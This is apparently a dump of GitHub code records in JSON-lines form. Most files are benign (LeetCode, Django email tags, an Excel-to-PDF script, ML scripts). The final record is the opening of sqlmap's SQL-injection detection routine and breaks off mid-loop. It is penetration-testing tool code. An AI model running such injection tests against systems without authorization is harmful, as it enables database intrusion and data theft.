suffix_to_choices=SUFFIX_TO_CHOICES,\n sent_join_char=\" \", # space or \\n\n incl_ans_choices=True,\n random_state=42,\n ):\n if demo_path is None:\n demo_path = Path(__file__).parent\n\n super().__init__(\n demo_file=demo_file,\n demo_path=demo_path,\n text_ans_choices=TEXT_ANS_CHOICES,\n prefix_to_choices=prefix_to_choices,\n suffix_to_choices=suffix_to_choices,\n sent_join_char=sent_join_char,\n incl_ans_choices=incl_ans_choices,\n random_state=random_state,\n )\n\n def _get_demo_id(self, data, fp):\n # e.g. 
fp = dev_resq_reas_chain.json\n file_name_meta = fp.stem.split(\"_\")\n split_type = file_name_meta[0]\n demo_id = f\"resq|{split_type}|{data['name']}\"\n return demo_id\n\n def _preprocess_demo(self, data, demo_id):\n demo = []\n for i, d in enumerate(data[\"data\"]):\n story = d[\"story\"]\n context_steps = len(story)\n\n context = \"\"\n for c in story:\n # unfortunately capitalize lowers the intermediate uppercases\n if not c[0].isupper():\n c = c[0].upper() + c[1:]\n c = c.replace(\" ,\", \",\").replace(\" .\", \".\")\n c = c.replace(\"( \", \"(\").replace(\" )\", \")\")\n if c[-1] != \".\":\n c += \".\"\n context += self.sent_join_char + c\n context = context.strip()\n\n for j, q in enumerate(d[\"questions\"]):\n if q.get(\"reasoning\"):\n cur_demo = {\"id\": f\"{demo_id}|{i}|{j}|{d['Context_id']}\"}\n\n cur_demo[\"context\"] = context\n cur_demo[\"context_steps\"] = context_steps\n\n cur_demo[\"question\"] = q[\"question\"]\n cur_demo[\"answer\"] = q[\"answer\"][0]\n\n cur_demo[\"reasoning\"] = self.sent_join_char.join(q[\"reasoning\"])\n cur_demo[\"reasoning_steps\"] = len(q[\"reasoning\"])\n\n demo.append(cur_demo)\n\n return demo\n","repo_name":"imbesat-rizvi/spatial_bench","sub_path":"data/ReSQ/reasoning_chain/ReSQDemoGenerator.py","file_name":"ReSQDemoGenerator.py","file_ext":"py","file_size_in_byte":2480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"35029014112","text":"#for a single file at a time\n\nimport openpyxl #library to read and write Excel files\nfrom win32com import client #for converting the final result to a pdf\npath = input(\"Enter the path of the Excel file\") #get path for the salary structure excel \npathout = input(\"Enter the destination path for the pdf file\") \ncell = input(\"Enter the cell address for ctc\") #get the cell address of the cell to enter ctc\nwb=openpyxl.load_workbook(path) #opening the excel file\nsh=wb['Sheet1'] #select the sheet\n\nctc=input(\"enter the ctc\") #getting value for ctc \nsh[cell]=ctc #inserting the ctc value into the selected sheet of the formulated excel\nwb.save(path) #save the excel with the new ctc value\n\nexcel = client.Dispatch(\"Excel.Application\") #open excel\n \nexcel.Interactive = False\nexcel.Visible = False\nsheets = excel.Workbooks.Open(path) \nwork_sheets = sheets.Worksheets(1) #read the first worksheet (COM collections are 1-based)\n\nwork_sheets.ExportAsFixedFormat(0, pathout) #convert to pdf and save at the path mentioned for output\nsheets.Close() #close the workbook in Excel\n","repo_name":"bimalroyv/salary-structure-creation","sub_path":"draft1.py","file_name":"draft1.py","file_ext":"py","file_size_in_byte":1545,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"4139039331","text":"#https://leetcode-cn.com/problems/keyboard-row/\r\n\r\n\"\"\"\r\nGiven a list of words, return only the words that can be typed using letters from a single row of the keyboard, as shown in the figure.\r\nExample:\r\nInput: [\"Hello\", \"Alaska\", \"Dad\", \"Peace\"]\r\nOutput: [\"Alaska\", \"Dad\"]\r\n\"\"\"\r\n\r\nclass Solution:\r\n def findWords(self, words: list):\r\n res = []\r\n first = [\"q\",\"w\",\"e\",\"r\",\"t\",\"y\",\"u\",\"i\",\"o\",\"p\",\"Q\",\"W\",\"E\",\"R\",\"T\",\"Y\",\"U\",\"I\",\"O\",\"P\"]\r\n second = [\"a\",\"s\",\"d\",\"f\",\"g\",\"h\",\"j\",\"k\",\"l\",\"A\",\"S\",\"D\",\"F\",\"G\",\"H\",\"J\",\"K\",\"L\"]\r\n third = [\"z\",\"x\",\"c\",\"v\",\"b\",\"n\",\"m\",\"Z\",\"X\",\"C\",\"V\",\"B\",\"N\",\"M\"]\r\n for i in range(len(words)):\r\n tmp = []\r\n for w in words[i]:\r\n if w in first:\r\n tmp.append(1)\r\n elif w in second:\r\n tmp.append(2)\r\n 
else:\r\n tmp.append(3)\r\n if len(set(tmp)) == 1:\r\n res.append(words[i])\r\n return res\r\n\r\n\r\nif __name__ == \"__main__\":\r\n words = [\"Hello\", \"Alaska\", \"Dad\", \"Peace\"]\r\n solution = Solution()\r\n result = solution.findWords(words)\r\n print(result)\r\n\r\n\r\n","repo_name":"alpharol/algorithm_python3","sub_path":"leetcode/0401-0500/0500.键盘行.py","file_name":"0500.键盘行.py","file_ext":"py","file_size_in_byte":1162,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"17193625470","text":"import datetime\r\nimport LatLon\r\nfrom dateutil import tz\r\n\r\nfrom django.contrib.auth.models import User\r\nfrom django import template\r\nfrom django.core.exceptions import ObjectDoesNotExist\r\nfrom django.conf import settings\r\nfrom django.utils.safestring import mark_safe\r\n\r\nfrom bfrs.models import Bushfire\r\nfrom bfrs import utils\r\n\r\nregister = template.Library()\r\n\r\n\r\n@register.inclusion_tag('bfrs/email/bushfire_details.html',takes_context=True)\r\ndef bushfire_details(context,bushfire,*fields):\r\n context[\"bushfire_fields\"]=fields\r\n context[\"cur_bushfire\"] = bushfire\r\n\r\n return context\r\n\r\n@register.simple_tag(takes_context=True)\r\ndef email_debug(context):\r\n import ipdb;ipdb.set_trace()\r\n\r\n@register.simple_tag\r\ndef get_jsonproperty(bushfire,property_name,default_value=None):\r\n \"\"\"\r\n return property value\r\n \"\"\"\r\n if bushfire:\r\n try:\r\n return bushfire.properties.get(name=property_name).json_value\r\n except ObjectDoesNotExist:\r\n return default_value\r\n else:\r\n return default_value\r\n\r\n\r\nFIELD_MAPPING = {\r\n \"origin_point_geo\":\"origin_point\"\r\n}\r\n@register.filter(is_safe=True)\r\ndef field_label(field_name, bushfire=None):\r\n \"\"\"\r\n Return the label of model field\r\n \"\"\"\r\n field_name = FIELD_MAPPING.get(field_name) or field_name\r\n if bushfire:\r\n try:\r\n return bushfire._meta.get_field(field_name).verbose_name\r\n except:\r\n return field_name\r\n else:\r\n return field_name\r\n\r\n\r\n@register.simple_tag()\r\ndef field_value(field_name, bushfire=None, request=None, url_type=\"auto\",is_upper=None,external_email=False):\r\n \"\"\"\r\n Return the value of model field to dispay in the email\r\n \"\"\"\r\n if bushfire:\r\n try:\r\n if field_name == \"origin_point_geo\":\r\n return bushfire.origin_geo\r\n elif field_name == \"region\":\r\n if is_upper == True:\r\n return bushfire.region.name.upper()\r\n else:\r\n return bushfire.region.name\r\n elif field_name == \"district\":\r\n if is_upper == True:\r\n return bushfire.district.name.upper()\r\n else:\r\n return bushfire.district.name\r\n elif field_name == \"fire_number\":\r\n if request and not external_email:\r\n return mark_safe(\"{}\".format(utils.get_bushfire_url(request,bushfire,url_type),bushfire.fire_number))\r\n else:\r\n return bushfire.fire_number\r\n elif field_name == \"url_link\":\r\n return mark_safe(\"{0}\".format(utils.get_bushfire_url(request,bushfire,url_type)))\r\n elif field_name == \"url\":\r\n return utils.get_bushfire_url(request,bushfire,url_type)\r\n elif field_name == \"report_status\":\r\n return bushfire.report_status_name\r\n elif field_name == \"latitude_degree\":\r\n return LatLon.Latitude(bushfire.origin_point.get_y()).degree\r\n elif field_name == \"latitude_minute\":\r\n return LatLon.Latitude(bushfire.origin_point.get_y()).minute\r\n elif field_name == \"latitude_second\":\r\n return LatLon.Latitude(bushfire.origin_point.get_y()).second\r\n elif 
field_name == \"longitude_degree\":\r\n return LatLon.Longitude(bushfire.origin_point.get_x()).degree\r\n elif field_name == \"longitude_minute\":\r\n return LatLon.Longitude(bushfire.origin_point.get_x()).minute\r\n elif field_name == \"longitude_second\":\r\n return LatLon.Longitude(bushfire.origin_point.get_x()).second\r\n \r\n\r\n value = getattr(bushfire, FIELD_MAPPING.get(field_name) or field_name)\r\n if field_name == \"dfes_incident_no\":\r\n return value or \"Not available\"\r\n elif value is None:\r\n return \"-\"\r\n elif type(value) == type(True):\r\n return \"Yes\" if value else \"No\"\r\n elif field_name == \"dispatch_pw\":\r\n return \"Yes\" if value == 1 else \"No\"\r\n elif isinstance(value,datetime.datetime):\r\n return value.astimezone(tz.gettz(settings.TIME_ZONE)).strftime('%Y-%m-%d %H:%M')\r\n else:\r\n value = str(value).strip()\r\n return value or \"-\"\r\n except:\r\n return \"-\"\r\n else:\r\n return \"-\"\r\n\r\n@register.filter(is_safe=True)\r\ndef field_style(field_name, bushfire=None):\r\n \"\"\"\r\n Return the style to display the value of model field in the email\r\n \"\"\"\r\n if bushfire:\r\n try:\r\n value = getattr(bushfire, field_name)\r\n if field_name == \"dfes_incident_no\":\r\n return \"\" if value else \"color:red;\"\r\n else:\r\n return \"\"\r\n except:\r\n return \"\"\r\n else:\r\n return \"\"\r\n\r\n","repo_name":"dbca-wa/bfrs","sub_path":"bfrs/templatetags/email_tags.py","file_name":"email_tags.py","file_ext":"py","file_size_in_byte":4991,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"38"} +{"seq_id":"16933849573","text":"import numpy as np\r\nfrom matplotlib import pyplot as plt\r\n\r\ndata = np.random.binomial(1, 0.25, (100000, 1000))\r\nepsilon = [0.5, 0.25, 0.1, 0.01, 0.001]\r\ntosses = np.arange(1, 1001)\r\n\r\n\r\ndef plot_means():\r\n for i in range(5):\r\n plt.plot(tosses, np.cumsum(data[i]) / tosses)\r\n plt.xlabel(\"Number of coins tosses\")\r\n plt.ylabel(\"Mean value\")\r\n plt.show()\r\n\r\n\r\ndef plot_variances():\r\n for eps in epsilon:\r\n plt.plot(tosses, np.minimum(1, 1 / (4 * tosses * (eps ** 2))), 'r',\r\n label='Chebyshev Bound')\r\n plt.plot(tosses, np.minimum(1, 2 * np.exp(-2 * tosses * (eps ** 2))),\r\n 'b', label='Hoeffding Bound')\r\n\r\n plt.plot(tosses,\r\n np.sum(abs((np.cumsum(data, axis=1) / tosses) - 0.25) >= eps,\r\n axis=0) / 100000, 'g', label='Percentage')\r\n\r\n plt.xlabel(\"Number of coins tosses\")\r\n plt.ylabel(\"Probability\")\r\n plt.title(r\"$\\epsilon$ = \" + str(eps))\r\n plt.legend()\r\n plt.show()\r\n\r\n\r\nplot_means()\r\nplot_variances()\r\n","repo_name":"RonMordoch/IML","sub_path":"Ex1/q16_concentration_inequalities.py","file_name":"q16_concentration_inequalities.py","file_ext":"py","file_size_in_byte":1057,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"5628952419","text":"\r\n\r\n\r\nar = [\"aba\", \"baba\", \"aba\", \"xzxb\"] #string input\r\narr = [\"aba\", \"xzxb\", \"ab\"] #queries to be searched\r\narray = []\r\n\r\nfor i in arr:\r\n count = 0\r\n for j in ar:\r\n if i == j:\r\n count += 1\r\n array.append(count)\r\nprint(array)\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"alif2499/HackerRank-Solutions","sub_path":"sparse_array_hackerrank.py","file_name":"sparse_array_hackerrank.py","file_ext":"py","file_size_in_byte":274,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"36495214691","text":"# -*- coding: utf-8 -*-\r\nimport 
os\r\nimport sys\r\nfrom os import path, listdir, mkdir\r\nimport numpy as np\r\nnp.random.seed(1)\r\nimport random\r\nrandom.seed(1)\r\nimport tensorflow as tf\r\ntf.set_random_seed(1)\r\nimport timeit\r\nimport cv2\r\nfrom models import get_vgg_unet\r\nimport skimage.io\r\nfrom tqdm import tqdm\r\n\r\ninput_shape = (1344, 1344)\r\n\r\ndef preprocess_inputs(x):\r\n zero_msk = (x == 0)\r\n x = x / 8.0\r\n x -= 127.5\r\n x[zero_msk] = 0\r\n return x\r\n\r\n\r\nif __name__ == '__main__':\r\n models_folder = 'wdata/AOI_3_Paris_Roads_Train/nn_models'\r\n pred_folder = 'wdata/predictions'\r\n model_name = 'vgg_big'\r\n\r\n city_datasets = dict(Vegas = 'AOI_2_Vegas_Roads_Train',\r\n Paris = 'AOI_3_Paris_Roads_Train')\r\n cities = ['Vegas', 'Paris']\r\n # cities = city_datasets.values()\r\n\r\n t0 = timeit.default_timer()\r\n\r\n\r\n if not path.isdir(pred_folder):\r\n mkdir(os.path.join(os.getcwd(),pred_folder))\r\n\r\n if not path.isdir(path.join(pred_folder, model_name)):\r\n mkdir(path.join(pred_folder, model_name))\r\n\r\n for it in [0, 1]:\r\n models = []\r\n\r\n if not path.isdir(path.join(pred_folder, model_name, str(it))):\r\n mkdir(path.join(pred_folder, model_name, str(it)))\r\n\r\n for i, city in enumerate(city_datasets):\r\n\r\n if not path.isdir(path.join(pred_folder, model_name, str(it), city)):\r\n mkdir(path.join(pred_folder, model_name, str(it), city))\r\n model = get_vgg_unet(input_shape, weights=None)\r\n model.load_weights(path.join(models_folder, 'vgg_model3_weights2_{0}_{1}.h5'.format(city, it)))\r\n models.append(model)\r\n\r\n print('Predicting fold', it)\r\n for city, d in city_datasets.items():\r\n for f in tqdm(sorted(listdir(path.join('wdata',d, 'MUL-PanSharpen')))):\r\n if path.isfile(path.join('wdata',d, 'MUL-PanSharpen', f)) and '.tif' in f:\r\n img_id = f.split('PanSharpen_')[1].split('.')[0]\r\n cinp = np.zeros((4,))\r\n cinp[cities.index(img_id.split('_')[2])] = 1.0\r\n cid = cinp.argmax()\r\n fpath = path.join('wdata',d, 'MUL-PanSharpen', f)\r\n img = skimage.io.imread(fpath, plugin='tifffile')\r\n img = cv2.copyMakeBorder(img, 22, 22, 22, 22, cv2.BORDER_REFLECT_101)\r\n inp = []\r\n inp.append(img)\r\n inp.append(np.rot90(img, k=1))\r\n inp = np.asarray(inp)\r\n inp = preprocess_inputs(inp)\r\n inp2 = []\r\n inp2.append(cinp)\r\n inp2.append(cinp)\r\n inp2 = np.asarray(inp2)\r\n pred = models[cid].predict([inp, inp2])\r\n mask = pred[0] + np.rot90(pred[1], k=3)\r\n mask /= 2\r\n mask = mask[22:1322, 22:1322, ...]\r\n mask = mask * 255\r\n mask = mask.astype('uint8')\r\n cv2.imwrite(path.join(pred_folder, model_name, str(it), city, '{0}.png'.format(img_id)), mask, [cv2.IMWRITE_PNG_COMPRESSION, 9])\r\n\r\n elapsed = timeit.default_timer() - t0\r\n print('Time: {:.3f} min'.format(elapsed / 60))\r\n","repo_name":"giserh/SpaceNet_Cannab_Geoyi_Update","sub_path":"Road_Detector_pacage/predict_vgg.py","file_name":"predict_vgg.py","file_ext":"py","file_size_in_byte":3310,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"29798903607","text":"# We're going to sum up the (made-up) years of experience\n# of all the employees\n\nimport json\nimport functools\n\nwith open('src/employees.json') as json_file:\n data = json.load(json_file)\n\n total_years = functools.reduce(\n lambda acc, emp: acc + emp['years_of_experience'], data, 0\n )\n\n 
print(total_years)\n","repo_name":"felixminom/intro_to_fp","sub_path":"src/reduce/fp_reduce.py","file_name":"fp_reduce.py","file_ext":"py","file_size_in_byte":335,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"22653413499","text":"import copy\nimport logging\nimport random\nimport re\nimport socket\nimport time\n\nfrom extra.beep.beep import beep\nfrom lib.core.agent import agent\nfrom lib.core.common import Backend\nfrom lib.core.common import extractRegexResult\nfrom lib.core.common import extractTextTagContent\nfrom lib.core.common import filterNone\nfrom lib.core.common import findDynamicContent\nfrom lib.core.common import Format\nfrom lib.core.common import getFilteredPageContent\nfrom lib.core.common import getLastRequestHTTPError\nfrom lib.core.common import getPublicTypeMembers\nfrom lib.core.common import getSafeExString\nfrom lib.core.common import getSortedInjectionTests\nfrom lib.core.common import hashDBRetrieve\nfrom lib.core.common import hashDBWrite\nfrom lib.core.common import intersect\nfrom lib.core.common import isDigit\nfrom lib.core.common import joinValue\nfrom lib.core.common import listToStrValue\nfrom lib.core.common import parseFilePaths\nfrom lib.core.common import popValue\nfrom lib.core.common import pushValue\nfrom lib.core.common import randomInt\nfrom lib.core.common import randomStr\nfrom lib.core.common import readInput\nfrom lib.core.common import showStaticWords\nfrom lib.core.common import singleTimeLogMessage\nfrom lib.core.common import singleTimeWarnMessage\nfrom lib.core.common import unArrayizeValue\nfrom lib.core.common import wasLastResponseDBMSError\nfrom lib.core.common import wasLastResponseHTTPError\nfrom lib.core.compat import xrange\nfrom lib.core.convert import getUnicode\nfrom lib.core.data import conf\nfrom lib.core.data import kb\nfrom lib.core.data import logger\nfrom lib.core.datatype import AttribDict\nfrom lib.core.datatype import InjectionDict\nfrom lib.core.decorators import stackedmethod\nfrom lib.core.dicts import FROM_DUMMY_TABLE\nfrom lib.core.dicts import HEURISTIC_NULL_EVAL\nfrom lib.core.enums import DBMS\nfrom lib.core.enums import HASHDB_KEYS\nfrom lib.core.enums import HEURISTIC_TEST\nfrom lib.core.enums import HTTP_HEADER\nfrom lib.core.enums import HTTPMETHOD\nfrom lib.core.enums import NOTE\nfrom lib.core.enums import NULLCONNECTION\nfrom lib.core.enums import PAYLOAD\nfrom lib.core.enums import PLACE\nfrom lib.core.enums import REDIRECTION\nfrom lib.core.enums import WEB_PLATFORM\nfrom lib.core.exception import SqlmapConnectionException\nfrom lib.core.exception import SqlmapDataException\nfrom lib.core.exception import SqlmapNoneDataException\nfrom lib.core.exception import SqlmapSilentQuitException\nfrom lib.core.exception import SqlmapSkipTargetException\nfrom lib.core.exception import SqlmapUserQuitException\nfrom lib.core.settings import BOUNDED_INJECTION_MARKER\nfrom lib.core.settings import CANDIDATE_SENTENCE_MIN_LENGTH\nfrom lib.core.settings import CHECK_INTERNET_ADDRESS\nfrom lib.core.settings import CHECK_INTERNET_VALUE\nfrom lib.core.settings import DEFAULT_COOKIE_DELIMITER\nfrom lib.core.settings import DEFAULT_GET_POST_DELIMITER\nfrom lib.core.settings import DUMMY_NON_SQLI_CHECK_APPENDIX\nfrom lib.core.settings import FI_ERROR_REGEX\nfrom lib.core.settings import FORMAT_EXCEPTION_STRINGS\nfrom lib.core.settings import HEURISTIC_CHECK_ALPHABET\nfrom lib.core.settings import INFERENCE_EQUALS_CHAR\nfrom lib.core.settings import 
IPS_WAF_CHECK_PAYLOAD\nfrom lib.core.settings import IPS_WAF_CHECK_RATIO\nfrom lib.core.settings import IPS_WAF_CHECK_TIMEOUT\nfrom lib.core.settings import MAX_DIFFLIB_SEQUENCE_LENGTH\nfrom lib.core.settings import MAX_STABILITY_DELAY\nfrom lib.core.settings import NON_SQLI_CHECK_PREFIX_SUFFIX_LENGTH\nfrom lib.core.settings import PRECONNECT_INCOMPATIBLE_SERVERS\nfrom lib.core.settings import SINGLE_QUOTE_MARKER\nfrom lib.core.settings import SLEEP_TIME_MARKER\nfrom lib.core.settings import SUHOSIN_MAX_VALUE_LENGTH\nfrom lib.core.settings import SUPPORTED_DBMS\nfrom lib.core.settings import UPPER_RATIO_BOUND\nfrom lib.core.settings import URI_HTTP_HEADER\nfrom lib.core.threads import getCurrentThreadData\nfrom lib.core.unescaper import unescaper\nfrom lib.request.connect import Connect as Request\nfrom lib.request.comparison import comparison\nfrom lib.request.inject import checkBooleanExpression\nfrom lib.request.templates import getPageTemplate\nfrom lib.techniques.union.test import unionTest\nfrom lib.techniques.union.use import configUnion\nfrom thirdparty import six\nfrom thirdparty.six.moves import http_client as _http_client\n\ndef checkSqlInjection(place, parameter, value):\n # Store here the details about boundaries and payload used to\n # successfully inject\n injection = InjectionDict()\n\n # Localized thread data needed for some methods\n threadData = getCurrentThreadData()\n\n # Favoring non-string specific boundaries in case of digit-like parameter values\n if isDigit(value):\n kb.cache.intBoundaries = kb.cache.intBoundaries or sorted(copy.deepcopy(conf.boundaries), key=lambda boundary: any(_ in (boundary.prefix or \"\") or _ in (boundary.suffix or \"\") for _ in ('\"', '\\'')))\n boundaries = kb.cache.intBoundaries\n elif value.isalpha():\n kb.cache.alphaBoundaries = kb.cache.alphaBoundaries or sorted(copy.deepcopy(conf.boundaries), key=lambda boundary: not any(_ in (boundary.prefix or \"\") or _ in (boundary.suffix or \"\") for _ in ('\"', '\\'')))\n boundaries = kb.cache.alphaBoundaries\n else:\n boundaries = conf.boundaries\n\n # Set the flag for SQL injection test mode\n kb.testMode = True\n\n paramType = conf.method if conf.method not in (None, HTTPMETHOD.GET, HTTPMETHOD.POST) else place\n tests = getSortedInjectionTests()\n seenPayload = set()\n\n kb.data.setdefault(\"randomInt\", str(randomInt(10)))\n kb.data.setdefault(\"randomStr\", str(randomStr(10)))\n\n while tests:\n test = tests.pop(0)\n\n try:\n if kb.endDetection:\n break\n\n if conf.dbms is None:\n # If the DBMS has not yet been fingerprinted (via simple heuristic check\n # or via DBMS-specific payload) and boolean-based blind has been identified\n # then attempt to identify with a simple DBMS specific boolean-based\n # test what the DBMS may be\n if not injection.dbms and PAYLOAD.TECHNIQUE.BOOLEAN in injection.data:\n if not Backend.getIdentifiedDbms() and kb.heuristicDbms is None and not kb.droppingRequests:\n kb.heuristicDbms = heuristicCheckDbms(injection)\n\n # If the DBMS has already been fingerprinted (via DBMS-specific\n # error message, simple heuristic check or via DBMS-specific\n # payload), ask the user to limit the tests to the fingerprinted\n # DBMS\n\n if kb.reduceTests is None and not conf.testFilter and (intersect(Backend.getErrorParsedDBMSes(), SUPPORTED_DBMS, True) or kb.heuristicDbms or injection.dbms):\n msg = \"it looks like the back-end DBMS is '%s'. 
\" % (Format.getErrorParsedDBMSes() or kb.heuristicDbms or joinValue(injection.dbms, '/'))\n msg += \"Do you want to skip test payloads specific for other DBMSes? [Y/n]\"\n kb.reduceTests = (Backend.getErrorParsedDBMSes() or [kb.heuristicDbms]) if readInput(msg, default='Y', boolean=True) else []\n\n # If the DBMS has been fingerprinted (via DBMS-specific error\n # message, via simple heuristic check or via DBMS-specific\n # payload), ask the user to extend the tests to all DBMS-specific,\n # regardless of --level and --risk values provided\n if kb.extendTests is None and not conf.testFilter and (conf.level < 5 or conf.risk < 3) and (intersect(Backend.getErrorParsedDBMSes(), SUPPORTED_DBMS, True) or kb.heuristicDbms or injection.dbms):\n msg = \"for the remaining tests, do you want to include all tests \"\n msg += \"for '%s' extending provided \" % (Format.getErrorParsedDBMSes() or kb.heuristicDbms or joinValue(injection.dbms, '/'))\n msg += \"level (%d)\" % conf.level if conf.level < 5 else \"\"\n msg += \" and \" if conf.level < 5 and conf.risk < 3 else \"\"\n msg += \"risk (%d)\" % conf.risk if conf.risk < 3 else \"\"\n msg += \" values? [Y/n]\" if conf.level < 5 and conf.risk < 3 else \" value? [Y/n]\"\n kb.extendTests = (Backend.getErrorParsedDBMSes() or [kb.heuristicDbms]) if readInput(msg, default='Y', boolean=True) else []\n\n title = test.title\n kb.testType = stype = test.stype\n clause = test.clause\n unionExtended = False\n trueCode, falseCode = None, None\n\n if conf.httpCollector is not None:\n conf.httpCollector.setExtendedArguments({\n \"_title\": title,\n \"_place\": place,\n \"_parameter\": parameter,\n })\n\n if stype == PAYLOAD.TECHNIQUE.UNION:\n configUnion(test.request.char)\n\n if \"[CHAR]\" in title:\n if conf.uChar is None:\n continue\n else:\n title = title.replace(\"[CHAR]\", conf.uChar)\n\n elif \"[RANDNUM]\" in title or \"(NULL)\" in title:\n title = title.replace(\"[RANDNUM]\", \"random number\")\n\n if test.request.columns == \"[COLSTART]-[COLSTOP]\":\n if conf.uCols is None:\n continue\n else:\n title = title.replace(\"[COLSTART]\", str(conf.uColsStart))\n title = title.replace(\"[COLSTOP]\", str(conf.uColsStop))\n\n elif conf.uCols is not None:\n debugMsg = \"skipping test '%s' because the user \" % title\n debugMsg += \"provided custom column range %s\" % conf.uCols\n logger.debug(debugMsg)\n continue\n\n match = re.search(r\"(\\d+)-(\\d+)\", test.request.columns)\n if match and injection.data:\n lower, upper = int(match.group(1)), int(match.group(2))\n for _ in (lower, upper):\n if _ > 1:\n __ = 2 * (_ - 1) + 1 if _ == lower else 2 * _\n unionExtended = True\n test.request._columns = test.request.columns\n test.request.columns = re.sub(r\"\\b%d\\b\" % _, str(__), test.request.columns)\n title = re.sub(r\"\\b%d\\b\" % _, str(__), title)\n test.title = re.sub(r\"\\b%d\\b\" % _, str(__), test.title)\n\n # Skip test if the user wants to test only for a specific\n # technique\n if conf.technique and isinstance(conf.technique, list) and stype not in conf.technique:\n debugMsg = \"skipping test '%s' because user \" % title\n debugMsg += \"specified testing of only \"\n debugMsg += \"%s techniques\" % \" & \".join(PAYLOAD.SQLINJECTION[_] for _ in conf.technique)\n logger.debug(debugMsg)\n continue\n\n # Skip test if it is the same SQL injection type already\n # identified by another test\n if injection.data and stype in injection.data:\n debugMsg = \"skipping test '%s' because \" % title\n debugMsg += \"the payload for %s has \" % PAYLOAD.SQLINJECTION[stype]\n 
debugMsg += \"already been identified\"\n logger.debug(debugMsg)\n continue\n\n # Parse DBMS-specific payloads' details\n if \"details\" in test and \"dbms\" in test.details:\n payloadDbms = test.details.dbms\n else:\n payloadDbms = None\n\n # Skip tests if title, vector or DBMS is not included by the\n # given test filter\n if conf.testFilter and not any(conf.testFilter in str(item) or re.search(conf.testFilter, str(item), re.I) for item in (test.title, test.vector, payloadDbms)):\n debugMsg = \"skipping test '%s' because its \" % title\n debugMsg += \"name/vector/DBMS is not included by the given filter\"\n logger.debug(debugMsg)\n continue\n\n # Skip tests if title, vector or DBMS is included by the\n # given skip filter\n if conf.testSkip and any(conf.testSkip in str(item) or re.search(conf.testSkip, str(item), re.I) for item in (test.title, test.vector, payloadDbms)):\n debugMsg = \"skipping test '%s' because its \" % title\n debugMsg += \"name/vector/DBMS is included by the given skip filter\"\n logger.debug(debugMsg)\n continue\n\n if payloadDbms is not None:\n # Skip DBMS-specific test if it does not match the user's\n # provided DBMS\n if conf.dbms and not intersect(payloadDbms, conf.dbms, True):\n debugMsg = \"skipping test '%s' because \" % title\n debugMsg += \"its declared DBMS is different than provided\"\n logger.debug(debugMsg)\n continue\n\n elif kb.dbmsFilter and not intersect(payloadDbms, kb.dbmsFilter, True):\n debugMsg = \"skipping test '%s' because \" % title\n debugMsg += \"its declared DBMS is different than provided\"\n logger.debug(debugMsg)\n continue\n\n elif kb.reduceTests == False:\n pass\n\n # Skip DBMS-specific test if it does not match the\n # previously identified DBMS (via DBMS-specific payload)\n elif injection.dbms and not intersect(payloadDbms, injection.dbms, True):\n debugMsg = \"skipping test '%s' because \" % title\n debugMsg += \"its declared DBMS is different than identified\"\n logger.debug(debugMsg)\n continue\n\n # Skip DBMS-specific test if it does not match the\n # previously identified DBMS (via DBMS-specific error message)\n elif kb.reduceTests and not intersect(payloadDbms, kb.reduceTests, True):\n debugMsg = \"skipping test '%s' because the heuristic \" % title\n debugMsg += \"tests showed that the back-end DBMS \"\n debugMsg += \"could be '%s'\" % unArrayizeValue(kb.reduceTests)\n logger.debug(debugMsg)\n continue\n\n # If the user did not decide to extend the tests to all\n # DBMS-specific or the test payload is not specific to the\n # identified DBMS, then only test for it if both level and risk\n # are below the corresponding configuration's level and risk\n # values\n if not conf.testFilter and not (kb.extendTests and intersect(payloadDbms, kb.extendTests, True)):\n # Skip test if the risk is higher than the provided (or default)\n # value\n if test.risk > conf.risk:\n debugMsg = \"skipping test '%s' because the risk (%d) \" % (title, test.risk)\n debugMsg += \"is higher than the provided (%d)\" % conf.risk\n logger.debug(debugMsg)\n continue\n\n # Skip test if the level is higher than the provided (or default)\n # value\n if test.level > conf.level:\n debugMsg = \"skipping test '%s' because the level (%d) \" % (title, test.level)\n debugMsg += \"is higher than the provided (%d)\" % conf.level\n logger.debug(debugMsg)\n continue\n\n # Skip test if it does not match the same SQL injection clause\n # already identified by another test\n clauseMatch = False\n\n for clauseTest in clause:\n if injection.clause is not None and clauseTest 
in injection.clause:\n clauseMatch = True\n break\n\n if clause != [0] and injection.clause and injection.clause != [0] and not clauseMatch:\n debugMsg = \"skipping test '%s' because the clauses \" % title\n debugMsg += \"differ from the clause already identified\"\n logger.debug(debugMsg)\n continue\n\n # Skip test if the user provided custom character (for UNION-based payloads)\n if conf.uChar is not None and (\"random number\" in title or \"(NULL)\" in title):\n debugMsg = \"skipping test '%s' because the user \" % title\n debugMsg += \"provided a specific character, %s\" % conf.uChar\n logger.debug(debugMsg)\n continue\n\n if stype == PAYLOAD.TECHNIQUE.UNION:\n match = re.search(r\"(\\d+)-(\\d+)\", test.request.columns)\n if match and not injection.data:\n _ = test.request.columns.split('-')[-1]\n if conf.uCols is None and _.isdigit():\n if kb.futileUnion is None:\n msg = \"it is recommended to perform \"\n msg += \"only basic UNION tests if there is not \"\n msg += \"at least one other (potential) \"\n msg += \"technique found. Do you want to reduce \"\n msg += \"the number of requests? [Y/n] \"\n kb.futileUnion = readInput(msg, default='Y', boolean=True)\n\n if kb.futileUnion and int(_) > 10:\n debugMsg = \"skipping test '%s'\" % title\n logger.debug(debugMsg)\n continue\n\n infoMsg = \"testing '%s'\" % title\n logger.info(infoMsg)\n\n # Force back-end DBMS according to the current test DBMS value\n # for proper payload unescaping\n Backend.forceDbms(payloadDbms[0] if isinstance(payloadDbms, list) else payloadDbms)\n\n # Parse test's <request>\n comment = agent.getComment(test.request) if len(conf.boundaries) > 1 else None\n fstPayload = agent.cleanupPayload(test.request.payload, origValue=value if place not in (PLACE.URI, PLACE.CUSTOM_POST, PLACE.CUSTOM_HEADER) and BOUNDED_INJECTION_MARKER not in (value or \"\") else None)\n\n for boundary in boundaries:\n 